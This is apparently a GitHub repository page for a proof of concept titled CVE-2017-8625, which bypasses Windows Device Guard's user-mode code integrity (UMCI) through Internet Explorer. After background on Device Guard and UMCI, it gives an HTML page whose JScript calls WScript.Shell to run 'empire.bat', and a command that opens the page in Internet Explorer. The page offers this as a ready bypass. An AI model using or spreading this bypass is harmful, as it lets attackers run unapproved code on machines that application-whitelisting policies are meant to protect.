Skip to content

homjxi0e/CVE-2017-8625_Bypass_UMCI

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 

Repository files navigation

what is ! Windows Defender Device Guard !


Windows Defender Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so that it can only run trusted applications that you define in your code integrity policies. If the app isn’t trusted it can’t run, period. With hardware that meets basic requirements, it also means that even if an attacker manages to get control of the Windows kernel, he or she will be much less likely to be able to run malicious executable code. With appropriate hardware, Windows Defender Device Guard can use the new virtualization-based security in Windows 10 (available in Enterprise and Education desktop SKUs and in all Server SKUs) to isolate the Code Integrity service from the Microsoft Windows kernel itself. In this case, the Code Integrity service runs alongside the kernel in a Windows hypervisor-protected container. This guide explores the individual features in Windows Defender Device Guard as well as how to plan for, configure, and deploy them. It includes:

what is UMCI

UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language mode. This makes obtaining code execution on a system fairly challenging. This post is going

======================================================================||>

bypass UMCI In Enternet Explorer by Jscript !

Let's go a code bypass show

======================================================================||>

<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

Modify Code Jscript !

screenshot from 2017-08-25 11-55-12 ======================================================================||>

Next Run bypass

screenshot from 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

Author explanation

Author Bypass

About

Bypass Feature UMCI in Internet Explorer

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages